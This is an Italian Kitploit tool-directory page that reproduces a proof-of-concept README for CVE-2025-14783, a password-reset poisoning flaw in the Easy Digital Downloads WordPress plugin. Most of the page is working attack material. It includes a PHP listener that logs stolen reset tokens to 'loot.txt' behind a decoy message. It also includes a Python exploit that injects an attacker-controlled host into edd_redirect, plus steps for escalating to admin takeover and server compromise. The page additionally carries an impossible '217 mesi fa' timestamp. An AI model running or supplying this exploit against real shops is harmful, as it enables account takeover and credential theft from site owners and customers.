Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-14783-POC — 🧨 CVE-2025-14783: Proof of Concept di Acquisizione dell'Account per Easy Digital Downloads | Kitploit
Strumenti/GitHubGitHub/zeroethical/cve-2025-14783-poc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingPaper e RicercaApprendimento e Formazione
GitHubzeroethical/cve-2025-14783-poc

CVE-2025-14783-POC

🧨 CVE-2025-14783: Proof of Concept di Acquisizione dell'Account per Easy Digital Downloads

Vedi Repository
217 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi


🧨 CVE-2025-14783: Easy Digital Downloads - Acquisizione Account PoC


Author Severity Vulnerability Language

"La fiducia è il difetto di sicurezza più sfruttabile."


💀 Descrizione

Questo repository contiene una Proof of Concept (PoC) funzionante per CVE-2025-14783, una vulnerabilità critica di Password Reset Poisoning (Avvelenamento del Reset Password) nel plugin Easy Digital Downloads (EDD) per WordPress (versioni <= 3.6.2).

A causa di una mancanza di validazione nel parametro edd_redirect durante il processo di richiesta di reset password, un utente malintenzionato remoto non autenticato può iniettare un dominio malevolo. Ciò fa sì che l'email legittima inviata dal negozio contenga un link di reset che punta al server dell'attaccante, filtrando il token di accesso (key) e permettendo un Account Takeover (ATO) totale, anche di account amministratore.


🔍 Analisi Tecnica

Il difetto risiede nella funzione che costruisce l'URL di reset all'interno dell'email. Il codice vulnerabile utilizza esc_url_raw() per "sanitizzare" l'input, ma non valida l'host di destinazione.

Frammento Vulnerabile

root@kitploit:~
// Lo sviluppatore ha confidato che esc_url_raw fosse sufficiente... errore fatale.
$message = str_replace(
    '{password_reset_link}',
    add_query_arg(
        array(
            'edd_action' => 'password_reset_requested',
            'key'        => $key,
            'login'      => rawurlencode( $user_login ),
        ),
        esc_url_raw( $_POST['edd_redirect'] ) // <--- PUNTO DI INIEZIONE
    ),
    $message
);

Controllando $_POST['edd_redirect'], controlliamo la base dell'URL generato.


🛠️ Installazione e Utilizzo

Requisiti

  • Python 3.x
  • Libreria requests (pip install requests)
  • Un server web sotto il tuo controllo (per catturare i token).

1. Configurare il Listener (Server dell'Attaccante)

Carica il seguente script PHP (logger.php) sul tuo server malevolo per intercettare i token delle vittime.

root@kitploit:~
<?php
// logger.php - Cattura il token e l'utente
$key = $_GET['key'] ?? '';
$login = $_GET['login'] ?? '';
$ip = $_SERVER['REMOTE_ADDR'];
$date = date('Y-m-d H:i:s');

if ($key && $login) {
    $log = "[$date] TARGET: $login | TOKEN: $key | IP: $ip" . PHP_EOL;
    file_put_contents('loot.txt', $log, FILE_APPEND);
    echo "Manutenzione del sistema. Riprova più tardi."; // Ingegneria sociale base
}
?>

2. Eseguire l'Exploit

Modifica lo script exploit.py con i tuoi obiettivi ed eseguilo.

root@kitploit:~
python3 exploit.py

Codice dell'Exploit (exploit.py)

root@kitploit:~
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CONFIGURAZIONE
TARGET_URL = "http://vulnerable-shop.com/" # URL radice del negozio
VICTIM_EMAIL = "[email protected]"
ATTACKER_HOST = "http://tu-servidor-malicioso.com/logger.php" 

def poison_reset_link():
    print(f"[*] Obiettivo: {TARGET_URL}")
    print(f"[*] Vittima: {VICTIM_EMAIL}")
    print(f"[*] Avvelenamento link con: {ATTACKER_HOST}")

    # Payload per iniettare il reindirizzamento
    data = {
        'edd_action': 'user_send_password_reset',
        'user_email': VICTIM_EMAIL,
        'edd_redirect': ATTACKER_HOST 
    }

    try:
        # Inviamo la richiesta all'endpoint principale (o dove EDD ascolta il POST)
        r = requests.post(TARGET_URL, data=data, verify=False, timeout=10)
        
        if r.status_code == 200:
            print("[+] Successo! Email avvelenata inviata.")
            print("[*] Ora attendi che la vittima clicchi sul link nell'email.")
            print("[*] Controlla 'loot.txt' sul tuo server per ottenere il token.")
        else:
            print(f"[-] Fallimento. Codice stato: {r.status_code}")
            
    except Exception as e:
        print(f"[!] Errore: {e}")

if __name__ == "__main__":
    poison_reset_link()

📊 Impatto

RiservatezzaIntegritàDisponibilità
ALTA 🟥ALTA 🟥BASSA 🟩

Un attaccante riuscito può:

  1. Intercettare il token di reset password.
  2. Cambiare la password della vittima (inclusi gli Amministratori).
  3. Accedere al pannello di amministrazione di WordPress.
  4. Caricare plugin malevoli (RCE) e compromettere l'intero server.

⚠️ Disclaimer

root@kitploit:~
Questo software viene fornito SOLO a scopo educativo e di ricerca sulla sicurezza.
L'autore (ZeroEthical) non è responsabile per l'uso improprio di queste informazioni.
Attaccare obiettivi senza consenso preventivo scritto è illegale e può comportare severe azioni legali.
Usalo a tuo rischio e pericolo in ambienti controllati.

Powered by ZeroEthical
"Non sistemiamo le vulnerabilità, le dimostriamo."

Scarica lo strumento